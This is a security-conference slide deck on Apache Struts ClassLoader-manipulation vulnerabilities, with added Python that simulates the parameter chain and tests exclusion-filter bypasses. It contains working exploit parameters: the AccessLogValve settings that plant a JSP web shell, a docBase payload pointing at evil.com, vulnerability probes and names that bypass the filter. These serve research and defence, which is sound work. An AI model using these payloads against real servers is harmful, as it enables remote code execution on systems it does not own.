
RootedCON 2015 - Deep inside the Java framework Apache Struts

Slides for the talk given at RootedCON 2015 security conference by Julián Vilas (security analyst and researcher).

The goal of the talk was to give an overview of the security of the Apache Struts framework.


1. Deep inside the Java framework Apache Struts
   Julián Vilas

2. Whoami
   • Julián Vilas (Redsadic)
     – @julianvilas
   • Security Analyst & Researcher

3. Apache Struts?
   Java framework
   – for Java webapps
   – Two major versions
     • Struts 1.x (EoL since 2013)
     • Struts 2.x

4. Why Struts?
   • (Mar 2014) CVE-2014-0094 goes public
   • What the hell was it?
     – Struts 2 vulnerability
     – Unauthenticated
     – All versions affected
     – Could lead to RCE

5. CVE-2014-0094
   "ParametersInterceptor allows access to 'class' parameter which is directly mapped to getClass() method and allows ClassLoader manipulation"
   • Credits:
     – Peter Magnusson
     – Przemysław Celej
   • After reading it…
     – Let's learn some basics

6. OGNL
   Object Graph Navigation Language
   • Expression Language for getting and setting properties of Java objects
     – Objects that are stored in the Context

7. OGNL
   #foo.dummy            // foo.getDummy()
   #bar.dummy            // bar.getDummy()
   dummy                 // qux.getDummy()
   dummy = "RootedCON"   // qux.setDummy("RootedCON")
   (Diagram: the Struts 2 OGNL context (ActionContext) holds foo, bar, baz and qux; the ValueStack, the context root, holds foo, bar, qux, … with "top" marking the top of the stack. #foo and #bar address context objects directly, while an unprefixed name such as dummy is resolved against the stack, here qux.)

8. Struts 2 request processing
   (Diagram: the user requests http://struts.example.com/example/hello.action; inside the Struts 2 app the request passes through the FilterDispatcher, the interceptor stack (where ParametersInterceptor runs), the Action and the Result, in steps numbered 1 to 7, and HTML is returned to the user.)

9. ParametersInterceptor
   "This interceptor gets all parameters from ActionContext.getParameters() and sets them on the value stack by calling ValueStack.setValue(String, Object)"
   "Because parameter names are effectively OGNL statements, it is important that security be taken into account"
   http://struts.apache.org/release/2.0.x/struts2-core/apidocs/com/opensymphony/xwork2/interceptor/ParametersInterceptor.html

10. ParametersInterceptor example
    (Diagram: HelloWorldAction is pushed onto the ValueStack; for each request parameter in the ActionContext the interceptor looks up the matching setter and sets the value.)

11. ParametersInterceptor example
    (image only)

12. Available methods
    Methods that can be reached
    – As seen, OGNL allows us to reference getters and setters
    (Diagram: HelloWorldAction, with execute(), getUsername() and setUsername(), extends ActionSupport, whose methods are marked "?" at this point.)

13. ActionSupport methods
    (image only)

14. Available methods (build of slide 12)
    (Diagram: ActionSupport adds … getErrors(), getTexts(), getFieldErrors(), getActionErrors(), getActionMessages(), getErrorMessages() … to what HelloWorldAction exposes.)

15. ActionSupport
    (image only)

16. Available methods (build of slide 14)
    (Diagram: ActionSupport in turn extends Object, which adds … getClass() … to the reachable methods.)

17. Navigating objects
    • Parameters are evaluated iteratively as an AST chain, composed of
      – A chain of getters (without parameters)
      – Ending with a setter (one String, boolean or int parameter)

18. Looking for setters
    • Through object navigation, several setter methods that are not part of the Action can be reached
      – What methods?
    • Post published by neobyte
      http://sec.baidu.com/index.php?research/detail/id/18
      1. PoC for getting reachable setters
      2. A method for getting RCE on Tomcat 8

19. DEMO
    Struts Tester on Tomcat 6 / 7 & Tomcat 8
    Customized & commented version ready to use:
    https://github.com/julianvilas/rooted2k15

20. Exploitability
    Tested against:
    • Tomcat 6 / 7 → RCE via "docBase" (Windows only)
    • Tomcat 8 → RCE via "AccessLogValve"
    • Glassfish 4 → RCE via "docBase" (Windows only)
    • Websphere 8.5 (developer) → RCE not found
    • Weblogic 10 & 12 → RCE not found
    • JBoss 7.1 & 7.4 → RCE not found

21. What about Struts 1
    • According to CVE-2014-0114, Struts 1 is also vulnerable
    • Unpatched! (Struts 1 is past EoL, but is still in use)
    • Different reason: Struts 1 has no OGNL and no ValueStack
      – The key: bean population with BeanUtils
    • You can find some Alvaro Muñoz (@pwntester) gold, like a further explanation and a filter to be applied as a workaround, at
      – http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.VBMB0i5_s0z
      – http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Update-your-Struts-1-ClassLoader-manipulation-filters/ba-p/6639204#.VOsFG7CG_8Q

22. AccessLogValve exploitation
    Parameters (numbered 1 to 4 on the slide):
    1. .directory=webapps/ROOT
    2. .prefix=shell
    3. .suffix=.jsp
    4. .fileDateFormat=1
    A log file named shell1.jsp is created in webapps/ROOT. When a nonexistent URL is requested, it is logged into that file (which is interpreted as a JSP when accessed).

23. DEMO
    AccessLogValve exploitation
    https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts_code_exec_classloader.rb

24. docBase exploitation
    • "The Document Base (also known as the Context Root) directory for this web application, or the pathname to the web application archive file (if this web application is being executed directly from the WAR file)."
    • Legit application goes down
    .docBase=//evil.com/shared

25. About the Metasploit module
    • Tomcat 6/7 & GlassFish (docBase)
      – Only Windows
      – Not landed yet in trunk but works fine
      – Matthew Hall (0x41414141) pull requests:
        https://github.com/rapid7/metasploit-framework/pull/3074
        https://github.com/rapid7/metasploit-framework/pull/3075
        https://github.com/rapid7/metasploit-framework/pull/3323
      – Same module as before; landed last night

26. DEMO
    docBase exploitation

27. I know Kung-fu
    • Now what?

28. Searching Struts sites
    • Dumb detection of Struts 2 sites
      – Default extension for Struts 2: ".action"
        • Also, in the default configuration, it accepts both ".action" and no extension

29. Searching Struts sites
    (image only)

30. Searching Struts sites
    (image only)

31. Searching Struts sites
    • Dumb detection of Struts 1 sites
      – Default extension for Struts 1: ".do"

32. Searching Struts sites
    https://web.archive.org/web/20060519001958/http://simonpeter.com/technology/java/struts/sites.html

33. Vulnerability checking
    • To check if a Struts 2 site is vulnerable, modify the "cacheMaxSize" property
      – Integer.MAX_VALUE == 2147483647 (a Java int is 32-bit on every platform)
    • Tomcat 6/7 & Glassfish
    • Tomcat 8
    (Probe values shown on the slide: 2147483647, 2147483648, AAAAAAAAA)

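
The navigation described on slide 17, the four AccessLogValve parameters of slide 22 and the cacheMaxSize probe of slide 33 can be exercised together against a stand-in object graph. The block below is an added example written for this page, not code from the talk, from Struts or from Tomcat. Its classes are Python stand-ins whose getter and setter names follow the Tomcat 8 path class.classLoader.resources.context.parent.pipeline.first used by the public Metasploit module (reproduced from memory, so treat it as an assumption), and the Java parameter types given to the two cacheMaxSize setters (int on a Tomcat 6/7-style resources object, long on Tomcat 8's StandardRoot) are likewise assumptions; they are what makes 2147483648 fail on the former and succeed on the latter while AAAAAAAAA fails on both.

```python
import re


class JInt(int): pass     # marker: Java int parameter (32-bit)
class JLong(int): pass    # marker: Java long parameter (64-bit)


def convert(value, target):
    """Stand-in for XWork type conversion: int/long reject non-digits and out-of-range values."""
    if target in (JInt, JLong):
        if not re.fullmatch(r"-?\d+", value):
            raise ValueError(f"NumberFormatException: {value!r}")
        bits = 32 if target is JInt else 64
        if not -(1 << (bits - 1)) <= int(value) < (1 << (bits - 1)):
            raise ValueError(f"NumberFormatException: {value!r} out of range")
        return int(value)
    return value.lower() == "true" if target is bool else value


# Stand-in object graph (assumption: names follow the Tomcat 8 chain used by
# the public Metasploit module; cacheMaxSize is int on 6/7 and long on 8).
class AccessLogValve:
    def __init__(self):
        self.directory, self.prefix, self.suffix = "logs", "access_log", ".txt"
        self.file_date_format = ".yyyy-MM-dd"
    def setDirectory(self, v: str): self.directory = v
    def setPrefix(self, v: str): self.prefix = v
    def setSuffix(self, v: str): self.suffix = v
    def setFileDateFormat(self, v: str): self.file_date_format = v
    def log_file_name(self, today="2015-03-06"):
        # Crude SimpleDateFormat: runs of pattern letters become the date,
        # anything else (such as "1") is copied literally -> prefix + "1" + suffix.
        stamp = re.sub(r"[A-Za-z][A-Za-z-]*", today, self.file_date_format)
        return f"{self.directory}/{self.prefix}{stamp}{self.suffix}"

class Pipeline:
    def __init__(self): self.first = AccessLogValve()
    def getFirst(self): return self.first

class Host:
    def __init__(self): self.pipeline = Pipeline()
    def getPipeline(self): return self.pipeline

class Context:
    def __init__(self): self.parent = Host()
    def getParent(self): return self.parent

class StandardRoot:            # Tomcat 8 WebResourceRoot stand-in
    def __init__(self): self.context, self.cache_max_size = Context(), 10240
    def getContext(self): return self.context
    def setCacheMaxSize(self, v: JLong): self.cache_max_size = v

class DirContextResources:     # Tomcat 6/7 resources stand-in, no context chain
    def __init__(self): self.cache_max_size = 10240
    def setCacheMaxSize(self, v: JInt): self.cache_max_size = v

class WebappClassLoader:
    def __init__(self, resources): self.resources = resources
    def getResources(self): return self.resources

class JClass:
    def __init__(self, loader): self.loader = loader
    def getClassLoader(self): return self.loader

class HelloWorldAction:
    def __init__(self, loader): self.username, self._cls = None, JClass(loader)
    def getClass(self): return self._cls       # OGNL maps the "class" property here
    def getUsername(self): return self.username
    def setUsername(self, v: str): self.username = v


def build_action(tomcat="8"):
    """Constructed sample graph: "8" wires the long-typed StandardRoot, "7" the int-typed resources."""
    res = StandardRoot() if tomcat == "8" else DirContextResources()
    return HelloWorldAction(WebappClassLoader(res))


def _accessor(obj, prefix, prop):
    return getattr(obj, prefix + prop[0].upper() + prop[1:], None)


def set_parameter(action, name, value):
    """ParametersInterceptor in miniature: getters for every segment but the last, then one setter."""
    obj, segments = action, name.split(".")
    for prop in segments[:-1]:
        getter = _accessor(obj, "get", prop)
        if getter is None:
            raise AttributeError(f"{type(obj).__name__}: no getter for {prop!r}")
        obj = getter()
    setter = _accessor(obj, "set", segments[-1])
    if setter is None:
        raise AttributeError(f"{type(obj).__name__}: no setter for {segments[-1]!r}")
    # The setter's declared Java type drives conversion of the String value.
    setter(convert(value, next(iter(setter.__annotations__.values()), str)))


def apply_parameters(action, params):
    """Returns {name: "ok" | error text}; a failing parameter is skipped, as XWork does, not fatal."""
    out = {}
    for name, value in params.items():
        try:
            set_parameter(action, name, value)
            out[name] = "ok"
        except (AttributeError, ValueError) as exc:
            out[name] = str(exc)
    return out


def reachable_setters(obj, depth=10, path="", seen=None):
    """Slide 18's PoC idea: follow no-arg getters and list every reachable setter as a parameter name."""
    seen = set() if seen is None else seen
    if depth < 0 or id(obj) in seen:
        return []
    seen.add(id(obj))
    found = []
    for attr in dir(obj):
        prop = attr[3:4].lower() + attr[4:]
        if attr.startswith("set") and len(attr) > 3:
            found.append(path + prop)
        elif attr.startswith("get") and len(attr) > 3:
            found += reachable_setters(getattr(obj, attr)(), depth - 1, path + prop + ".", seen)
    return found


VALVE = "class.classLoader.resources.context.parent.pipeline.first."
SLIDE_22_PAYLOAD = {VALVE + "directory": "webapps/ROOT", VALVE + "prefix": "shell",
                    VALVE + "suffix": ".jsp", VALVE + "fileDateFormat": "1"}


def log_file_after_payload():
    """Applies the four slide-22 parameters to a Tomcat 8 graph; returns the valve's new log path."""
    action = build_action("8")
    apply_parameters(action, SLIDE_22_PAYLOAD)
    valve = (action.getClass().getClassLoader().getResources().getContext()
             .getParent().getPipeline().getFirst())
    return valve.log_file_name()
```

reachable_setters(build_action("8")) lists class.classLoader.resources.cacheMaxSize together with the eight-segment valve paths, which is the enumeration the neobyte PoC on slide 18 performs against a real JVM; apply_parameters on the "7" graph returns the NumberFormatException text for 2147483648 where the "8" graph returns "ok", the difference slide 33 relies on.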
34. Vulnerability checking
    • In Struts 1, if the conversion from String to Integer fails, a default value of 0 is set
    • But when trying to call a setter that receives an Object with a String, an exception is raised

35. OK I see, but…

36. Previous security bulletins
    (Table; the bulletin-ID column was lost in extraction and only the descriptions survive.)
    – RCE, when form validation fails field values are interpreted as OGNL
    – RCE, bypass the '#'-usage protection built into the ParametersInterceptor to execute OGNL
    – RCE, bypass the '#'-usage protection built into the ParametersInterceptor to execute OGNL → the S2-003 fix was incomplete
    – RCE, user's input is evaluated as OGNL when there's a conversion error
    – Several RCE: via ExceptionDelegator (same as S2-007), CookieInterceptor (same idea as S2-003 and S2-005), etc.
    – RCE, incomplete fix for S2-003 and S2-005 on ParametersInterceptor

37. Previous security bulletins (continued)
    – RCE, incomplete fix for S2-003, S2-005 and S2-009 on ParametersInterceptor when using values for redirections
    – RCE, s:url and s:a tags, when "includeParams" is set, allow evaluating the values of request parameters as OGNL
    – RCE, same as S2-013, incomplete fix
    – RCE, actions using wildcards and double OGNL evaluation allow OGNL injection
    – RCE: DefaultActionMapper short-circuit navigation interpreted as OGNL
    – RCE, what we saw in this presentation ☺ (ParametersInterceptor)
    – RCE, incomplete fix for S2-020
    – Incomplete fix for S2-020 and S2-021

38. Previous security bulletins
    (image only)

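
The last rows of slide 37 (incomplete fixes for S2-020 and S2-021) come down to the excludeParams regular expressions that ParametersInterceptor applies to parameter names before they reach the value stack. The block below is an added example, not code from the talk or from Struts: it holds the S2-020 pattern (^class\..*, as I recall it from 2.3.16.1) and the broader pattern I recall from 2.3.16.2, both reproduced from memory and to be checked against the release you actually run, and tests them against parameter names that still reach getClass() because OGNL resolves a capitalised first letter to the same getter, accepts bracket navigation and lets a chain start from top or another property.

```python
import re

# Struts 2.3.16.1 (the S2-020 fix) appended this to ParametersInterceptor's
# default excludeParams.  Pattern as recalled; verify against your release.
S2_020_EXCLUDE = [r"^class\..*"]

# Struts 2.3.16.2 (the S2-021 fix) replaced it with this broader pattern
# (as recalled), covering "Class", bracket navigation and chains that reach
# "class" through another property such as top.
S2_021_EXCLUDE = [r'''(.*\.|^|.*|\[('|"))(c|C)lass(\.|('|")]|\[).*''']

# Constructed parameter names that walk to getClass() without starting with
# the literal "class." that the first pattern anchors on.
BYPASSES = [
    "Class.classLoader.resources.context.docBase",
    "class['classLoader']['resources']['context']['docBase']",
    "top.class.classLoader.resources.context.docBase",
    "top['class'].classLoader.resources.context.docBase",
]
# Constructed ordinary form-field names that must keep working.
LEGIT = ["username", "user.address.street"]


def is_excluded(name, patterns):
    """ParametersInterceptor.isExcluded() uses Matcher.matches(), i.e. the
    whole parameter name must match; re.fullmatch is the Python equivalent."""
    return any(re.fullmatch(p, name) for p in patterns)


def survey(patterns, names=BYPASSES + LEGIT):
    """{name: blocked?} for every constructed name under one exclude list."""
    return {n: is_excluded(n, patterns) for n in names}


def unblocked_bypasses(patterns):
    """The bypass names that would still be set on the value stack."""
    return [n for n in BYPASSES if not is_excluded(n, patterns)]
```

survey(S2_020_EXCLUDE) shows that only a name literally beginning with class. is stopped, so all four bypass names pass, while survey(S2_021_EXCLUDE) blocks all four and leaves the legitimate names alone. The cost of the broader pattern is visible too: because one of its alternatives is an unanchored .*, any parameter containing class followed by a dot, such as myclass.field, is also excluded.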
39. Conclusions?
    • Seven years between S2-001 and S2-020
    • Same kind of vulnerabilities: injecting OGNL from user-supplied data
    • Several bypasses for fixes
    • Almost all RCE
    • Draw your own…

40. Bonus track - Confluence
    • Based on a WebWork fork (predating Struts 2)
    • If you look at their bulletins
      – Versions up to and including 5.5.1 are vulnerable to ClassLoader manipulation
        https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+2014-05-21
      – Versions up to 5.6 (before 5.6.6 and 5.5.7) are vulnerable to double OGNL evaluation
        https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-+2015-01-21
    • Don't they look familiar? ☺

41. Bonus track - Confluence
    (image only)

42. Questions?
    • You can also ask:
      – Poke me around
      – By Twitter: @julianvilas

43. Questions?
    • And what do you think about OGNL?
    Thanks for attending!!! ☺